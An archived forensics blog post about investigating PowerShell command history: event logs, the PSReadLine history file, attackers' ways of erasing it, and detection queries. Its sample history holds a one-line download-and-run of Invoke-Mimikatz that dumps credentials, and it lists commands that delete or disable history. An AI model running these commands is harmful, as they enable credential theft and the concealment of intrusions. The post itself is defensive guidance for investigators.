{
	"id": "3954e8ca-4135-49fd-808b-12e89001e57f",
	"created_at": "2026-04-06T00:12:32.743146Z",
	"updated_at": "2026-04-10T03:21:55.509172Z",
	"deleted_at": null,
	"sha1_hash": "d0aa44a2fd17727da99b833b60dffe0d233ca847",
	"title": "PowerShell Command History Forensics",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58004,
	"plain_text": "PowerShell Command History Forensics\r\nBy Vikas 26 Aug 2020\r\nPublished: 2020-08-26 · Archived: 2026-04-05 18:21:31 UTC\r\nContents:\r\n- Overview\r\nPowerShell and Windows Events\r\nGet-History\r\nConsole History File\r\n- Adversarial Tactics\r\nClear-History\r\nBackup/Restore History\r\nDelete History File\r\nChange PSReadline Configuration\r\n- Investigation Tips\r\nOverview\r\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating\r\nsystem. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution\r\nof code.\r\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or run in\r\nmemory without ever touching disk.\r\nWe have a separate blog post that touches on certain aspects of a malicious PowerShell script: Decoding Malicious\r\nPowerShell Activity - A Case Study - Blog - Malware Questions - Sophos Community\r\nA number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.\r\nPowerShell and Windows Events\r\nWith Sophos EDR, you can use the “PowerShell events suspected of using encoded or encrypted data” Live Discover Query. It\r\noutputs a list of PowerShell processes and script block events that are suspected of using encoded or encrypted data.\r\nOn the host side of forensics, there are three places where we look for signs of suspicious PowerShell script or command\r\nexecution, whether it’s local or remote:\r\n1. Application Event Logs\r\nEvent ID 7045: Adversaries often attempt to register backdoors as Windows Services as a persistence mechanism, i.e. to\r\nsurvive reboots.\r\n2. Windows PowerShell.evtx\r\nEvent ID 400: The engine status is changed from None to Available. 
This event indicates the start of a PowerShell\r\nactivity, whether local or remote.\r\nThe field ‘HostApplication’ might display the encoded bits used, such as:\r\nHostApplication=powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAC0ATwBiAGoAZQBjAHQAIAAiAEgAZQBsAGwAbwAsACAAdwBvBkACEAIgA7AA==\r\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nPage 1 of 4\n\nEvent ID 600 indicates that providers such as WSMan start to perform a PowerShell activity on the system, for\r\nexample, “Provider WSMan Is Started”.\r\nEvent ID 403: The engine status is changed from Available to Stopped. This event records the completion of a\r\nPowerShell activity.\r\n3. Microsoft-Windows-PowerShell/Operational.evtx\r\nNOTE: This is not applicable to PowerShell 2.0.\r\nEvent ID 4103: Module Logging is disabled by default. If enabled, it will record portions of scripts, some de-obfuscated code, and some data formatted for output.\r\nEvent ID 4104: Script Block Logging is enabled by default. It records blocks of code as they are executed by the\r\nPowerShell engine, thereby capturing the full contents of code executed by an attacker, including scripts and\r\ncommands.\r\nThere’s a fourth place where we can potentially look from a forensic perspective. If commands are carried out in a\r\nPowerShell console, a session history, i.e. the list of commands entered during the current session, is saved. On PowerShell\r\nversions \u003c 5, a session-specific history can be identified using the Get-History command. The list is lost if the session is\r\nclosed.\r\nGet-History\r\nThe Get-History cmdlet gets the session history, that is, the list of commands entered during the current session. 
Beginning\r\nin Windows PowerShell 3.0, the default maximum history count is 4096.\r\nPS C:\\WINDOWS\\system32\u003e Get-History\r\n  Id CommandLine\r\n  -- -----------\r\n   1 (Get-PSReadlineOption).HistorySavePath\r\n   2 ping localhost\r\n   3 Test-Path ((Get-PSReadlineOption).HistorySavePath)\r\n   4 Get-History\r\n   5 powershell.exe -exec bypass -C \"IEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke\r\nMimikatz.ps1');Invoke-Mimikatz -DumpCreds\"\r\n   6 whoami\r\nConsole History File\r\nThe PSReadline module is installed and enabled by default starting from PowerShell v5 on Windows 10 onwards. It is\r\nresponsible for recording what is typed into the console. The default option is to save history to a file.\r\nNOTE: PSReadLine is not included in the separately installed PowerShell 5 for previous versions of Windows. Thus, if you\r\nwant to use the PowerShell command history functionality you will need to install the PSReadLine module separately.\r\nThe default location of this file:\r\n$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\nPSReadLine requires PowerShell 3.0 or newer and the console host. It does not work in PowerShell ISE.\r\nA sample output:\r\nAdversarial Tactics\r\nAttackers have been observed deleting forensic artifacts in the form of Windows Event Logs to cover their tracks. They may also\r\nclear the command history of a compromised account to conceal the commands executed during/after a successful intrusion.\r\nWe’ll discuss some of the possible tactics in detail.\r\nClear-History\r\nBy default, Clear-History deletes the entire command history from a PowerShell session, but it does not delete/flush the\r\nPSReadLine command history file on disk. 
This tactic would be useful for attackers on PowerShell versions \u003c5 on\r\nWindows 7 / 8.1 / Windows Server 2008 / R2 / 2012R2, as there is no physical file containing the command history.\r\nBackup/Restore History\r\nBack up the existing file with a view to restoring it afterwards, e.g.\r\nrename-item -path $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt -newname ConsoleHost_history_before.txt\r\nIf they use PowerShell to perform this activity, the action itself will be logged.\r\nDelete History File\r\nThe adversary could delete the history file from the PowerShell prompt at the end of a session:\r\nremove-item -force -path $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\nChange PSReadline Configuration\r\nAn adversary may change the default behaviour of the PSReadline configuration and prevent the history of commands from being\r\nrecorded:\r\nSet-PSReadlineOption -HistorySaveStyle SaveNothing\r\nThey could possibly re-enable it afterwards:\r\nSet-PSReadlineOption -HistorySaveStyle SaveIncrementally\r\nThe act of changing the history save style from a PowerShell prompt would be logged. The presence of these commands in the\r\nhistory would be a red flag. 
It may sound like overkill, but for the sake of completeness it is worth a mention.\r\nInvestigation Tips\r\nIf you happen to stumble upon a rich ConsoleHost_history.txt like the one below, you’re in luck.\r\nIf the last command(s) executed are surprisingly few, or include:\r\nSet-PSReadlineOption -HistorySaveStyle SaveIncrementally\r\nor\r\nrename-item -path $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt -newname ConsoleHost_history_before.txt\r\nor\r\nClear-History\r\nor\r\nConsoleHost_history.txt is not present on the machine,\r\nit could mean that the history or the file itself has been tampered with.\r\nThese indicators of compromise (IOCs) could help us identify what might have happened:\r\n1. If the file was tampered with, we would like to identify whether a non-PowerShell process such as Command Prompt or\r\nWindows Explorer was used to modify/delete the history file.\r\n2. The “Creation Time” of ConsoleHost_history.txt is fairly recent. This could indicate that the attacker deleted the\r\nprevious file and that it was automatically regenerated when PowerShell was executed again.\r\n3. 
If we recorded any process-related detail that had the following command line:\r\n-HistorySaveStyle SaveNothing\r\nThe following Live Discover Query could be used prior to the investigation of the actual ConsoleHost_history.txt file if you\r\nsuspect any modification/deletion:\r\nselect CAST( datetime(sfj.time,'unixepoch') AS TEXT) DATE_TIME,\r\nsfj.subject,\r\nCAST( datetime(sfj.creationtime,'unixepoch') AS TEXT) CREATION_DATE_TIME,\r\nsfj.pathname,\r\nspj.cmdline,\r\nspj.sid\r\nfrom sophos_file_journal sfj join sophos_process_journal spj on spj.sophosPID = sfj.sophosPID\r\nwhere sfj.pathname like '%ConsoleHost_history.txt' and spj.cmdline not like '%powershell%';\r\nIf the file has been deleted by Explorer.exe, the output should be similar to:",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
	],
	"report_names": [
		"powershell-command-history-forensics"
	],
	"threat_actors": [],
	"ts_created_at": 1775434352,
	"ts_updated_at": 1775791315,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.pdf",
		"text": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.txt",
		"img": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.jpg"
	}
}